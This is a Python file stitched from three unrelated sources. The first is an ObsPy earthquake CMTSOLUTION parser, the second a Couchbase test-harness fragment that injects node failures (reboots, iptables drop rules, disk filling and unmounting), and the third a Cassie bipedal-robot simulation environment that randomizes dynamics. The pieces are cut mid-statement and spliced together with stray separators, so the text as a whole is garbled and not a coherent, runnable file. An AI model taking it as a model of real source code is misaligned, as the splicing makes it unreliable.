from future.builtins import * # NOQA @UnusedWildImport
import math
import uuid
import warnings
from obspy import UTCDateTime
from obspy.core.event import (Catalog, Comment, Event, EventDescription,
Origin, Magnitude, FocalMechanism, MomentTensor,
Tensor, SourceTimeFunction)
from obspy.geodetics import FlinnEngdahl
_fe = FlinnEngdahl()
def _get_resource_id(cmtname, res_type, tag=None):
"""
Helper function to create consistent resource ids.
"""
res_id = "smi:local/cmtsolution/%s/%s" % (cmtname, res_type)
if tag is not None:
res_id += "#" + tag
return res_id
def _buffer_proxy(filename_or_buf, function, reset_fp=True,
file_mode="rb", *args, **kwargs):
"""
Calls a function with an open file or file-like object as the first
argument. If the file originally was a filename, the file will be
opened, otherwise it will just be passed to the underlying function.
:param filename_or_buf: File to pass.
:type filename_or_buf: str, open file, or file-like object.
:param function: The function to call.
:param reset_fp: If True, the file pointer will be set to the initial
position after the function has been called.
:type reset_fp: bool
:param file_mode: Mode to open file in if necessary.
"""
try:
position = filename_or_buf.tell()
is_buffer = True
except AttributeError:
is_buffer = False
if is_buffer is True:
ret_val = function(filename_or_buf, *args, **kwargs)
if reset_fp:
filename_or_buf.seek(position, 0)
return ret_val
else:
with open(filename_or_buf, file_mode) as fh:
return function(fh, *args, **kwargs)
def _is_cmtsolution(filename_or_buf):
"""
Checks if the file is a CMTSOLUTION file.
:param filename_or_buf: File to test.
:type filename_or_buf: str or file-like object.
"""
try:
return _buffer_proxy(filename_or_buf, _internal_is_cmtsolution,
reset_fp=True)
# Happens for example when passing the data as a string which would be
# interpreted as a filename.
except OSError:
return False
def _internal_is_cmtsolution(buf):
"""
Checks if the file is a CMTSOLUTION file.
:param buf: File to check.
:type buf: Open file or open file like object.
"""
# The file format is so simple. Just attempt to read the first event. If
# it passes it will be read again but that has really no
# significant performance impact.
try:
_internal_read_single_cmtsolution(buf)
return True
except Exception:
return False
def _read_cmtsolution(filename_or_buf, **kwargs):
"""
Reads a CMTSOLUTION file to a :class:`~obspy.core.event.Catalog` object.
:param filename_or_buf: File to read.
:type filename_or_buf: str or file-like object.
"""
return _buffer_proxy(filename_or_buf, _internal_read_cmtsolution, **kwargs)
def _internal_read_cmtsolution(buf, **kwargs):
"""
Reads a CMTSOLUTION file to a :class:`~obspy.core.event.Catalog` object.
:param buf: File to read.
:type buf: Open file or open file like object.
"""
events = []
cur_pos = buf.tell()
# This also works with BytesIO and what not.
buf.seek(0, 2)
size = buf.tell()
buf.seek(cur_pos, 0)
# This is pretty inefficient due to all the file pointer jumping but
# performance is really the least of our concerns. Also most performance
# is still lost initializing the large ObsPy event objects.
while True:
if buf.tell() >= size:
break
line = buf.readline().strip()
# If there is something, jump back to the beginning of the line and
# read the next event.
if line:
buf.seek(cur_pos, 0)
events.append(_internal_read_single_cmtsolution(buf))
cur_pos = buf.tell()
return Catalog(resource_id=_get_resource_id("catalog", str(uuid.uuid4())),
events=events)
def _internal_read_single_cmtsolution(buf):
"""
Reads a single CMTSOLUTION file to a :class:`~obspy.core.event.Catalog`
object.
:param buf: File to read.
:type buf: Open file or open file like object.
"""
# The first line encodes the preliminary epicenter.
line = buf.readline()
hypocenter_catalog = line[:5].strip().decode()
origin_time = line[5:].strip().split()[:6]
values = list(map(int, origin_time[:-1])) + \
[float(origin_time[-1])]
try:
origin_time = UTCDateTime(*values)
except (TypeError, ValueError):
warnings.warn("Could not determine origin time from line: %s. Will "
"be set to zero." % line)
origin_time = UTCDateTime(0)
line = line[28:].split()
latitude, longitude, depth, body_wave_mag, surface_wave_mag = \
map(float, line[:5])
# The rest encodes the centroid solution.
event_name = buf.readline().strip().split()[-1].decode()
preliminary_origin = Origin(
resource_id=_get_resource_id(event_name, "origin", tag="prelim"),
time=origin_time,
longitude=longitude,
latitude=latitude,
# Depth is in meters.
depth=depth * 1000.0,
origin_type="hypocenter",
region=_fe.get_region(longitude=longitude, latitude=latitude),
evaluation_status="preliminary"
)
preliminary_bw_magnitude = Magnitude(
resource_id=_get_resource_id(event_name, "magnitude", tag="prelim_bw"),
mag=body_wave_mag, magnitude_type="Mb",
evaluation_status="preliminary",
origin_id=preliminary_origin.resource_id)
preliminary_sw_magnitude = Magnitude(
resource_id=_get_resource_id(event_name, "magnitude", tag="prelim_sw"),
mag=surface_wave_mag, magnitude_type="MS",
evaluation_status="preliminary",
origin_id=preliminary_origin.resource_id)
values = ["time_shift", "half_duration", "latitude", "longitude",
"depth", "m_rr", "m_tt", "m_pp", "m_rt", "m_rp", "m_tp"]
cmt_values = {_i: float(buf.readline().strip().split()[-1])
for _i in values}
# Moment magnitude calculation in dyne * cm.
m_0 = 1.0 / math.sqrt(2.0) * math.sqrt(
cmt_values["m_rr"] ** 2 +
cmt_values["m_tt"] ** 2 +
cmt_values["m_pp"] ** 2 +
2.0 * cmt_values["m_rt"] ** 2 +
2.0 * cmt_values["m_rp"] ** 2 +
2.0 * cmt_values["m_tp"] ** 2)
m_w = 2.0 / 3.0 * (math.log10(m_0) - 16.1)
# Convert to meters.
cmt_values["depth"] *= 1000.0
# Convert to Newton meter.
values = ["m_rr", "m_tt", "m_pp", "m_rt", "m_rp", "m_tp"]
for value in values:
cmt_values[value] /= 1E7
cmt_origin = Origin(
resource_id=_get_resource_id(event_name, "origin", tag="cmt"),
time=origin_time + cmt_values["time_shift"],
longitude=cmt_values["longitude"],
latitude=cmt_values["latitude"],
depth=cmt_values["depth"],
origin_type="centroid",
# Could rarely be different than the epicentral region.
region=_fe.get_region(longitude=cmt_values["longitude"],
latitude=cmt_values["latitude"])
# No evaluation status as it could be any of several and the file
# format does not provide that information.
)
cmt_mag = Magnitude(
resource_id=_get_resource_id(event_name, "magnitude", tag="mw"),
# Round to 2 digits.
mag=round(m_w, 2),
magnitude_type="mw",
origin_id=cmt_origin.resource_id
)
foc_mec = FocalMechanism(
resource_id=_get_resource_id(event_name, "focal_mechanism"),
# The preliminary origin most likely triggered the focal mechanism
# determination.
triggering_origin_id=preliminary_origin.resource_id
)
tensor = Tensor(
m_rr=cmt_values["m_rr"],
m_pp=cmt_values["m_pp"],
m_tt=cmt_values["m_tt"],
m_rt=cmt_values["m_rt"],
m_rp=cmt_values["m_rp"],
m_tp=cmt_values["m_tp"]
)
# Source time function is a triangle, according to the SPECFEM manual.
stf = SourceTimeFunction(
type="triangle",
# The duration is twice the half duration.
duration=2.0 * cmt_values["half_duration"]
)
mt = MomentTensor(
resource_id=_get_resource_id(event_name, "moment_tensor"),
derived_origin_id=cmt_origin.resource_id,
moment_magnitude_id=cmt_mag.resource_id,
# Convert to Nm.
scalar_moment=m_0 / 1E7,
tensor=tensor,
source_time_function=stf
)
# Assemble everything.
foc_mec.moment_tensor = mt
ev = Event(resource_id=_get_resource_id(event_name, "event"),
event_type="earthquake")
ev.event_descriptions.append(EventDescription(text=event_name,
type="earthquake name"))
ev.comments.append(Comment(
text="Hypocenter catalog: %s" % hypocenter_catalog,
force_resource_id=False))
ev.origins.append(cmt_origin)
ev.origins.append(preliminary_origin)
ev.magnitudes.append(cmt_mag)
ev.magnitudes.append(preliminary_bw_magnitude)
ev.magnitudes.append(preliminary_sw_magnitude)
ev.focal_mechanisms.append(foc_mec)
# Set the preferred items.
ev.preferred_origin_id = cmt_origin.resource_id.id
ev.preferred_magnitude_id = cmt_mag.resource_id.id
ev.preferred_focal_mechanism_id = foc_mec.resource_id.id
return ev
def _write_cmtsolution(catalog, filename_or_buf, **kwargs):
"""
Write an event to a file.
:param catalog: The catalog to write. Can only contain one event.
:type catalog: :class:`~obspy.core.event.Catalog`
:param filename_or_buf: Filename or file-like object to write to.
:type filename_or_buf: str, open file, or file-like object.
"""
return _buffer_proxy(filename_or_buf, _internal_write_cmtsolution,
file_mode="wb", catalog=catalog, **kwargs)
def _internal_write_cmtsolution(buf, catalog, **kwargs):
"""
Write events to a file.
:param buf: File to write to.
:type buf: Open file or file-like object.
:param catalog: The catalog to write.
:type catalog: :class:`~obspy.core.event.Catalog`
"""
# Some sanity checks.
if len(catalog) < 1:
raise ValueError("Catalog must contain at least one event")
for event in catalog:
_internal_write_single_cmtsolution(buf, event)
# Add an empty line between events.
if len(catalog) > 1:
buf.write(b"\n")
def _internal_write_single_cmtsolution(buf, event, **kwargs):
"""
Write an event to a file.
:param buf: File to write to.
:type buf: Open file or file-like object.
:param event: The event to write.
:type event: :class:`~obspy.core.event.Event`
"""
if not event.focal_mechanisms:
raise ValueError("Event must contain a focal mechanism.")
foc_mec = event.preferred_focal_mechanism() or event.focal_mechanisms[0]
if not foc_mec.moment_tensor:
raise ValueError("The preferred or first focal mechanism must "
"contain a moment tensor.")
mt = foc_mec.moment_tensor
if not mt.tensor:
raise ValueError("The preferred or first focal mechanism must "
"contain a moment tensor element with an actual "
"tensor.")
if not event.origins:
raise ValueError("Event must have at least one origin.")
if not event.magnitudes:
raise ValueError("Event must have at least one magnitude.")
# Attempt to get the body and surface wave magnitudes.
mb_candidates = \
[_i for _i in event.magnitudes if _i.magnitude_type == "Mb"]
ms_candidates = \
[_i for _i in event.magnitudes if _i.magnitude_type == "MS"]
if not mb_candidates:
warnings.warn("No body wave magnitude found. Will be replaced by the "
"first magnitude in the event object.")
mb_mag = event.magnitudes[0]
else:
mb_mag = mb_candidates[0]
if not ms_candidates:
warnings.warn("No surface wave magnitude found. Will be replaced by "
"the first magnitude in the event object.")
ms_mag = event.magnitudes[0]
else:
ms_mag = ms_candidates[0]
# Now find the cmt origin. First attempt to get the derived origin of
# the moment tensor,
if mt.derived_origin_id:
cmt_origin = mt.derived_origin_id.get_referred_object()
# Otherwise try to find the first one that is CMT
else:
candidates = [_i for _i in event.origins
if _i.origin_type == "centroid"]
if candidates:
warnings.warn("No derived origin attached to the moment tensor. "
"Will instead use | |
= node_failure_timer.start_time
def _disable_firewall(self, node):
shell = RemoteMachineShellConnection(node)
shell.disable_firewall()
shell.disconnect()
def _restart_couchbase_server(self, node):
node_failure_timer = self.failure_timers[self.itr]
self.task_manager.add_new_task(node_failure_timer)
time.sleep(2)
shell = RemoteMachineShellConnection(node)
shell.restart_couchbase()
shell.disconnect()
self.test_log.debug("{0} - Restarted couchbase server".format(node))
self.task_manager.get_task_result(node_failure_timer)
self.start_time = node_failure_timer.start_time
def _stop_couchbase_server(self, node):
node_failure_timer = self.failure_timers[self.itr]
self.task_manager.add_new_task(node_failure_timer)
time.sleep(1)
shell = RemoteMachineShellConnection(node)
shell.stop_couchbase()
shell.disconnect()
self.test_log.debug("{0} - Stopped couchbase server".format(node))
self.task_manager.get_task_result(node_failure_timer)
self.start_time = node_failure_timer.start_time
def _start_couchbase_server(self, node):
shell = RemoteMachineShellConnection(node)
shell.start_couchbase()
shell.disconnect()
self.test_log.debug("{0} - Started couchbase server".format(node))
def _stop_restart_network(self, node, stop_time):
node_failure_timer = self.failure_timers[self.itr]
self.task_manager.add_new_task(node_failure_timer)
time.sleep(2)
shell = RemoteMachineShellConnection(node)
shell.stop_network(stop_time)
shell.disconnect()
self.test_log.debug("Stopped the network for {0} sec and restarted "
"the network on {1}".format(stop_time, node))
self.task_manager.get_task_result(node_failure_timer)
self.start_time = node_failure_timer.start_time
def _restart_machine(self, node):
node_failure_timer = self.failure_timers[self.itr]
self.task_manager.add_new_task(node_failure_timer)
time.sleep(2)
shell = RemoteMachineShellConnection(node)
command = "/sbin/reboot"
shell.execute_command(command=command)
shell.disconnect()
self.task_manager.get_task_result(node_failure_timer)
self.start_time = node_failure_timer.start_time
def _stop_memcached(self, node):
node_failure_timer = self.failure_timers[self.itr]
self.task_manager.add_new_task(node_failure_timer)
time.sleep(2)
shell = RemoteMachineShellConnection(node)
o, r = shell.stop_memcached()
self.test_log.debug("Killed memcached. {0} {1}".format(o, r))
shell.disconnect()
self.task_manager.get_task_result(node_failure_timer)
self.start_time = node_failure_timer.start_time
def _start_memcached(self, node):
shell = RemoteMachineShellConnection(node)
o, r = shell.start_memcached()
self.test_log.debug("Started back memcached. {0} {1}".format(o, r))
shell.disconnect()
def _block_incoming_network_from_node(self, node1, node2):
shell = RemoteMachineShellConnection(node1)
self.test_log.debug("Adding {0} into iptables rules on {1}"
.format(node1.ip, node2.ip))
command = "iptables -A INPUT -s {0} -j DROP".format(node2.ip)
shell.execute_command(command)
shell.disconnect()
self.start_time = time.time()
def _fail_disk(self, node):
shell = RemoteMachineShellConnection(node)
output, error = shell.unmount_partition(self.disk_location)
success = True
if output:
for line in output:
if self.disk_location in line:
success = False
if success:
self.test_log.debug("Unmounted disk at location : {0} on {1}"
.format(self.disk_location, node.ip))
self.start_time = time.time()
else:
exception_str = "Could not fail the disk at {0} on {1}" \
.format(self.disk_location, node.ip)
self.test_log.error(exception_str)
self.set_exception(Exception(exception_str))
shell.disconnect()
def _recover_disk(self, node):
shell = RemoteMachineShellConnection(node)
o, r = shell.mount_partition(self.disk_location)
for line in o:
if self.disk_location in line:
self.test_log.debug("Mounted disk at location : {0} on {1}"
.format(self.disk_location, node.ip))
return
self.set_exception(Exception("Failed mount disk at location {0} on {1}"
.format(self.disk_location, node.ip)))
shell.disconnect()
raise Exception()
def _disk_full_failure(self, node):
shell = RemoteMachineShellConnection(node)
output, error = shell.fill_disk_space(self.disk_location, self.disk_size)
success = False
if output:
for line in output:
if self.disk_location in line:
if "0 100% {0}".format(self.disk_location) in line:
success = True
if success:
self.test_log.debug("Filled up disk Space at {0} on {1}"
.format(self.disk_location, node.ip))
self.start_time = time.time()
else:
self.test_log.debug("Could not fill the disk at {0} on {1}"
.format(self.disk_location, node.ip))
self.set_exception(Exception("Failed to fill disk at {0} on {1}"
.format(self.disk_location, node.ip)))
shell.disconnect()
def _recover_disk_full_failure(self, node):
shell = RemoteMachineShellConnection(node)
delete_file = "{0}/disk-quota.ext3".format(self.disk_location)
output, error = shell.execute_command("rm -f {0}".format(delete_file))
self.test_log.debug(output)
if error:
self.test_log.error(error)
shell.disconnect()
def _check_for_autofailover_initiation(self, failed_over_node):
rest = RestConnection(self.master)
ui_logs = rest.get_logs(10)
ui_logs_text = [t["text"] for t in ui_logs]
ui_logs_time = [t["serverTime"] for t in ui_logs]
expected_log = "Starting failing over ['ns_1@{}']".format(
failed_over_node.ip)
if expected_log in ui_logs_text:
failed_over_time = ui_logs_time[ui_logs_text.index(expected_log)]
return True, failed_over_time
return False, None
def _wait_for_autofailover_initiation(self, timeout):
autofailover_initated = False
while time.time() < timeout + self.start_time:
autofailover_initated, failed_over_time = \
self._check_for_autofailover_initiation(
self.current_failure_node)
if autofailover_initated:
end_time = self._get_mktime_from_server_time(failed_over_time)
time_taken = end_time - self.start_time
return autofailover_initated, time_taken
return autofailover_initated, -1
def _get_mktime_from_server_time(self, server_time):
time_format = "%Y-%m-%dT%H:%M:%S"
server_time = server_time.split('.')[0]
mk_time = time.mktime(time.strptime(server_time, time_format))
return mk_time
def _rebalance(self):
rest = RestConnection(self.master)
nodes = rest.node_statuses()
rest.rebalance(otpNodes=[node.id for node in nodes])
rebalance_progress = rest.monitorRebalance()
if not rebalance_progress:
self.set_result(False)
self.set_exception(Exception("Failed to rebalance after failover"))
def _check_if_rebalance_in_progress(self, timeout):
rest = RestConnection(self.master)
end_time = time.time() + timeout
while time.time() < end_time:
try:
rebalance_status, progress = \
rest._rebalance_status_and_progress()
if rebalance_status == "running":
continue
elif rebalance_status is None and progress == 100:
return False, -1
except RebalanceFailedException:
ui_logs = rest.get_logs(10)
ui_logs_text = [t["text"] for t in ui_logs]
ui_logs_time = [t["serverTime"] for t in ui_logs]
rebalace_failure_log = "Rebalance exited with reason"
for ui_log in ui_logs_text:
if rebalace_failure_log in ui_log:
rebalance_failure_time = ui_logs_time[
ui_logs_text.index(ui_log)]
failover_log = "Could not automatically fail over " \
"node ('ns_1@{}'). Rebalance is " \
"running.".format(
self.current_failure_node.ip)
if failover_log in ui_logs_text:
return True, self._get_mktime_from_server_time(
rebalance_failure_time)
else:
return False, -2
return False, -3
class NodeDownTimerTask(Task):
def __init__(self, node, port=None, timeout=300):
Task.__init__(self, "NodeDownTimerTask")
self.test_log.debug("Initializing NodeDownTimerTask")
self.node = node
self.port = port
self.timeout = timeout
self.start_time = 0
def call(self):
self.test_log.debug("Starting execution of NodeDownTimerTask")
end_task = time.time() + self.timeout
while not self.completed and time.time() < end_task:
if not self.port:
try:
self.start_time = time.time()
response = os.system("ping -c 1 {} > /dev/null".format(
self.node))
if response != 0:
self.test_log.debug(
"Injected failure in {}. Caught due to ping"
.format(self.node))
self.complete_task()
self.set_result(True)
break
except Exception as e:
self.test_log.warning("Unexpected exception: {}".format(e))
self.complete_task()
return True
try:
self.start_time = time.time()
socket.socket().connect(("{}".format(self.node), 8091))
socket.socket().close()
socket.socket().connect(("{}".format(self.node), 11210))
socket.socket().close()
except socket.error:
self.test_log.debug(
"Injected failure in {}. Caught due to ports"
.format(self.node))
self.complete_task()
return True
else:
try:
self.start_time = time.time()
socket.socket().connect(("{}".format(self.node),
int(self.port)))
socket.socket().close()
socket.socket().connect(("{}".format(self.node), 11210))
socket.socket().close()
except socket.error:
self.test_log.debug("Injected failure in {}"
.format(self.node))
self.complete_task()
return True
if time.time() >= end_task:
self.complete_task()
self.test_log.error("Could not inject failure in {}"
.format(self.node))
return False
class Atomicity(Task):
instances = 1
num_items = 10000
mutations = num_items
start_from = 0
op_type = "insert"
persist_to = 1
replicate_to = 1
task_manager = []
write_offset = []
def __init__(self, cluster, task_manager, bucket, client, clients, generator, op_type, exp, flag=0,
persist_to=0, replicate_to=0, time_unit="seconds",
only_store_hash=True, batch_size=1, pause_secs=1, timeout_secs=5, compression=True,
process_concurrency=8, print_ops_rate=True, retries=5,update_count=1, transaction_timeout=5,
commit=True, durability=None, sync=True, num_threads=5, record_fail=False):
super(Atomicity, self).__init__("AtomicityDocumentsLoadGenTask")
self.generators = generator
self.cluster = cluster
self.commit = commit
Atomicity.record_fail = record_fail
Atomicity.num_docs = num_threads
self.exp = exp
self.flag = flag
Atomicity.sync = sync
self.persit_to = persist_to
self.replicate_to = replicate_to
self.time_unit = time_unit
self.only_store_hash = only_store_hash
self.pause_secs = pause_secs
self.timeout_secs = timeout_secs
Atomicity.transaction_timeout = transaction_timeout
self.compression = compression
self.process_concurrency = process_concurrency
self.client = client
Atomicity.task_manager = task_manager
self.batch_size = batch_size
self.print_ops_rate = print_ops_rate
self.retries = retries
self.op_type = op_type
self.bucket = bucket
self.clients = clients
Atomicity.clients = clients[0]
Atomicity.generator = generator
Atomicity.updatecount = update_count
if durability == "MAJORITY":
Atomicity.durability = 1
elif durability == "MAJORITY_AND_PERSIST_ON_MASTER":
Atomicity.durability = 2
elif durability == "PERSIST_TO_MAJORITY":
Atomicity.durability = 3
elif durability == "ONLY_NONE":
Atomicity.durability = 4
else:
Atomicity.durability = 0
def call(self):
tasks = []
self.start_task()
iterator = 0
self.gen = []
if self.op_type == "time_out":
transaction_config = Transaction().createTransactionConfig(2, Atomicity.durability)
else:
self.test_log.info("transaction timeout is {}".format(Atomicity.transaction_timeout))
transaction_config = Transaction().createTransactionConfig(Atomicity.transaction_timeout, Atomicity.durability)
try:
self.transaction = Transaction().createTansaction(self.client.cluster, transaction_config)
self.test_log.info("transaction is {}".format(self.transaction))
except Exception as e:
self.set_exception(e)
for generator in self.generators:
tasks.extend(self.get_tasks(generator))
iterator += 1
self.test_log.debug("going to add new task")
for task in tasks:
Atomicity.task_manager.add_new_task(task)
for task in tasks:
Atomicity.task_manager.get_task_result(task)
self.transaction.close()
for con in self.clients:
for client in con:
client.close()
def get_tasks(self, generator):
generators = []
tasks = []
gen_start = int(generator.start)
gen_end = max(int(generator.end), 1)
gen_range = max(int((generator.end - generator.start)/self.process_concurrency), 1)
for pos in range(gen_start, gen_end, gen_range):
partition_gen = copy.deepcopy(generator)
partition_gen.start = pos
partition_gen.itr = pos
partition_gen.end = pos + gen_range
if partition_gen.end > generator.end:
partition_gen.end = generator.end
batch_gen = BatchedDocumentGenerator(
partition_gen,
self.batch_size)
generators.append(batch_gen)
for i in range(0, len(generators)):
task = self.Loader(self.cluster, self.bucket[i], self.client, generators[i], self.op_type,
self.exp, self.flag, persist_to=self.persit_to, replicate_to=self.replicate_to,
time_unit=self.time_unit, batch_size=self.batch_size,
pause_secs=self.pause_secs, timeout_secs=self.timeout_secs,
compression=self.compression,
instance_num = 1,transaction=self.transaction, commit=self.commit)
tasks.append(task)
return tasks
class Loader(GenericLoadingTask):
'''
1. Start inserting data into buckets
2. Keep updating the write offset
3. Start the reader thread
4. Keep track of non durable documents
'''
def __init__(self, cluster, bucket, client, generator, op_type, exp,
flag=0, persist_to=0, replicate_to=0, time_unit="seconds",
batch_size=1, pause_secs=1, timeout_secs=5,
compression=True, throughput_concurrency=4, retries=5,
instance_num=0, transaction=None, commit=True):
super(Atomicity.Loader, self).__init__(
cluster, bucket, client, batch_size=batch_size,
pause_secs=pause_secs,
timeout_secs=timeout_secs, compression=compression,
retries=retries, transaction=transaction, commit=commit)
self.generator = generator
self.op_type = []
self.op_type.extend(op_type.split(';'))
self.thread_name = "Atomicity_Loader_Task-{}_{}_{}" \
.format(generator._doc_gen.start,
generator._doc_gen.end,
op_type)
self.commit = commit
self.exp = exp
self.flag = flag
self.persist_to = persist_to
self.replicate_to = replicate_to
self.compression = compression
self.pause_secs = pause_secs
self.timeout_secs = timeout_secs
self.time_unit = time_unit
self.instance = instance_num
self.transaction = transaction
self.client = client
self.bucket = bucket
self.exp_unit = "seconds"
def has_next(self):
return self.generator.has_next()
def call(self):
self.start_task()
self.test_log.info("Starting Atomicity load generation thread")
exception = None
first_batch = {}
last_batch = {}
self.all_keys = []
self.update_keys = []
self.delete_keys = []
docs = []
self.keys_values = {}
doc_gen = self.generator
while self.has_next():
self.key_value = doc_gen.next_batch()
self._process_values_for_create(self.key_value)
self.all_keys.extend(self.key_value.keys())
self.keys_values.update(self.key_value)
for op_type in self.op_type:
if op_type == 'general_create':
for client in Atomicity.clients:
self.batch_create(
self.key_value, client,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
timeout=self.timeout, time_unit=self.time_unit,
doc_type=self.generator.doc_type)
for key, value in self.key_value.items():
content = self.client.translate_to_json_object(value)
tuple = Tuples.of(key, content)
docs.append(tuple)
| |
from .cassiemujoco import pd_in_t, state_out_t, CassieSim, CassieVis
from .trajectory import CassieTrajectory
from math import floor
import numpy as np
import os
import random
import pickle
class CassieEnv_rand_dyn:
def __init__(self, traj, simrate=60, clock_based=False, state_est=False):
self.sim = CassieSim("./cassie/cassiemujoco/cassie.xml")
self.vis = None
self.clock_based = clock_based
self.state_est = state_est
if clock_based:
self.observation_space = np.zeros(42)
if self.state_est:
self.observation_space = np.zeros(48) # Size for use with state est
else:
self.observation_space = np.zeros(80)
if self.state_est:
self.observation_space = np.zeros(86) # Size for use with state est
self.action_space = np.zeros(10)
dirname = os.path.dirname(__file__)
if traj == "walking":
traj_path = os.path.join(dirname, "trajectory", "stepdata.bin")
elif traj == "stepping":
traj_path = os.path.join(dirname, "trajectory", "more-poses-trial.bin")
self.trajectory = CassieTrajectory(traj_path)
self.P = np.array([100, 100, 88, 96, 50])
self.D = np.array([10.0, 10.0, 8.0, 9.6, 5.0])
self.u = pd_in_t()
# TODO: should probably initialize this to current state
self.cassie_state = state_out_t()
self.simrate = simrate # simulate X mujoco steps with same pd target
# 60 brings simulation from 2000Hz to roughly 30Hz
self.time = 0 # number of time steps in current episode
self.phase = 0 # portion of the phase the robot is in
self.counter = 0 # number of phase cycles completed in episode
# NOTE: a reference trajectory represents ONE phase cycle
# should be floor(len(traj) / simrate) - 1
# should be VERY cautious here because wrapping around trajectory
# badly can cause assymetrical/bad gaits
self.phaselen = floor(len(self.trajectory) / self.simrate) - 1
# see include/cassiemujoco.h for meaning of these indices
self.pos_idx = [7, 8, 9, 14, 20, 21, 22, 23, 28, 34]
self.vel_idx = [6, 7, 8, 12, 18, 19, 20, 21, 25, 31]
self.speed = 0
# maybe make ref traj only send relevant idxs?
ref_pos, ref_vel = self.get_ref_state(self.phase)
self.prev_action = ref_pos[self.pos_idx]
self.phase_add = 1
# Record default dynamics parameters
self.default_damping = self.sim.get_dof_damping()
self.default_mass = self.sim.get_body_mass()
self.default_ipos = self.sim.get_body_ipos()
#print(self.default_damping)
#print(self.default_mass)
#print(self.default_ipos)
#input()
def step_simulation(self, action):
# maybe make ref traj only send relevant idxs?
ref_pos, ref_vel = self.get_ref_state(self.phase + self.phase_add)
target = action + ref_pos[self.pos_idx]
self.u = pd_in_t()
for i in range(5):
# TODO: move setting gains out of the loop?
# maybe write a wrapper for pd_in_t ?
self.u.leftLeg.motorPd.pGain[i] = self.P[i]
self.u.rightLeg.motorPd.pGain[i] = self.P[i]
self.u.leftLeg.motorPd.dGain[i] = self.D[i]
self.u.rightLeg.motorPd.dGain[i] = self.D[i]
self.u.leftLeg.motorPd.torque[i] = 0 # Feedforward torque
self.u.rightLeg.motorPd.torque[i] = 0
self.u.leftLeg.motorPd.pTarget[i] = target[i]
self.u.rightLeg.motorPd.pTarget[i] = target[i + 5]
self.u.leftLeg.motorPd.dTarget[i] = 0
self.u.rightLeg.motorPd.dTarget[i] = 0
self.cassie_state = self.sim.step_pd(self.u)
def step(self, action):
for _ in range(self.simrate):
self.step_simulation(action)
height = self.sim.qpos()[2]
self.time += 1
self.phase += self.phase_add
if self.phase > self.phaselen:
self.phase = 0
self.counter += 1
# Early termination
done = not(height > 0.4 and height < 3.0)
reward = self.compute_reward()
# TODO: make 0.3 a variable/more transparent
if reward < 0.3:
done = True
return self.get_full_state(), reward, done, {}
def reset(self, randomize=True):
# Randomize dynamics:
if randomize:
damp = self.default_damping
weak_factor = 1
strong_factor = 1
pelvis_damp_range = [[damp[0], damp[0]], [damp[1], damp[1]], [damp[2], damp[2]], [damp[3], damp[3]], [damp[4], damp[4]], [damp[5], damp[5]]] # 0->5
hip_damp_range = [[damp[6]/weak_factor, damp[6]*weak_factor], [damp[7]/weak_factor, damp[7]*weak_factor], [damp[8]/weak_factor, damp[8]*weak_factor]] # 6->8 and 19->21
achilles_damp_range = [[damp[9]/weak_factor, damp[9]*weak_factor], [damp[10]/weak_factor, damp[10]*weak_factor], [damp[11]/weak_factor, damp[11]*weak_factor]] # 9->11 and 22->24
knee_damp_range = [[damp[12]/weak_factor, damp[12]*weak_factor]] # 12 and 25
shin_damp_range = [[damp[13]/weak_factor, damp[13]*weak_factor]] # 13 and 26
tarsus_damp_range = [[damp[14], damp[14]*strong_factor]] # 14 and 27
heel_damp_range = [[damp[15], damp[15]]] # 15 and 28
fcrank_damp_range = [[damp[16]/weak_factor, damp[16]*weak_factor]] # 16 and 29
prod_damp_range = [[damp[17], damp[17]]] # 17 and 30
foot_damp_range = [[damp[18]/weak_factor, damp[18]*weak_factor]] # 18 and 31
side_damp = hip_damp_range + achilles_damp_range + knee_damp_range + shin_damp_range + tarsus_damp_range + heel_damp_range + fcrank_damp_range + prod_damp_range + foot_damp_range
damp_range = pelvis_damp_range + side_damp + side_damp
damp_noise = [np.random.uniform(a, b) for a, b in damp_range]
print(damp_noise - self.default_damping)
#nbody layout:
# 0: worldbody (zero)
# 1: pelvis
# 2: left hip roll
# 3: left hip yaw
# 4: left hip pitch
# 5: left achilles rod
# 6: left knee
# 7: left knee spring
# 8: left shin
# 9: left tarsus
# 10: left heel spring
# 12: left foot crank
# 12: left plantar rod
# 13: left foot
# 14: right hip roll
# 15: right hip yaw
# 16: right hip pitch
# 17: right achilles rod
# 18: right knee
# 19: right knee spring
# 20: right shin
# 21: right tarsus
# 22: right heel spring
# 23: right foot crank
# 24: right plantar rod
# 25: right foot
hi = 1.2
lo = 0.8
m = self.default_mass
pelvis_mass_range = [[lo*m[1], hi*m[1]]] # 1
hip_mass_range = [[lo*m[2], hi*m[2]], # 2->4 and 14->16
[lo*m[3], hi*m[3]],
[lo*m[4], hi*m[4]]]
achilles_mass_range = [[lo*m[5], hi*m[5]]] # 5 and 17
knee_mass_range = [[lo*m[6], hi*m[6]]] # 6 and 18
knee_spring_mass_range = [[lo*m[7], hi*m[7]]] # 7 and 19
shin_mass_range = [[lo*m[8], hi*m[8]]] # 8 and 20
tarsus_mass_range = [[lo*m[9], hi*m[9]]] # 9 and 21
heel_spring_mass_range = [[lo*m[10], hi*m[10]]] # 10 and 22
fcrank_mass_range = [[lo*m[11], hi*m[11]]] # 11 and 23
prod_mass_range = [[lo*m[12], hi*m[12]]] # 12 and 24
foot_mass_range = [[lo*m[13], hi*m[13]]] # 13 and 25
side_mass = hip_mass_range + achilles_mass_range + knee_mass_range + knee_spring_mass_range + shin_mass_range + tarsus_mass_range + heel_spring_mass_range + fcrank_mass_range + prod_mass_range + foot_mass_range
mass_range = [[0, 0]] + pelvis_mass_range + side_mass + side_mass
mass_noise = [np.random.uniform(a, b) for a, b in mass_range]
delta = 0.001
com_noise = [0, 0, 0] + [self.default_ipos[i] + np.random.uniform(-delta, delta) for i in range(3, len(self.default_ipos))]
"""
pelvis_com_range = [[0.05066, 0.05066], [0.000346, 0.000346], [0.02841, 0.02841]] # 3->5
left_hip_com_range = [[-0.01793, -0.01793], [0.0001, 0.0001], [-0.04428, -0.04428], [0.0, 0.0], [-1e-5, -1e-5], [-0.034277, -0.034277], [0.05946, 0.05946], [0.00005, 0.00005], [-0.03581, -0.03581]] # 6->14
right_hip_com_range = [[-0.01793, -0.01793], [0.0001, 0.0001], [-0.04428, -0.04428], [0.0, 0.0], [ 1e-5, 1e-5], [-0.034277, -0.034277], [0.05946, 0.05946], [0.00005, 0.00005], [ 0.03581, 0.03581]] # 42->50
achilles_com_range = [[0.24719, 0.24719], [0.0, 0.0], [0.0, 0.0]] # 15->17 and 51->53
left_knee_com_range = [[0.023, 0.023], [0.03207, 0.03207], [-0.002181, -0.002181]] # 18->20
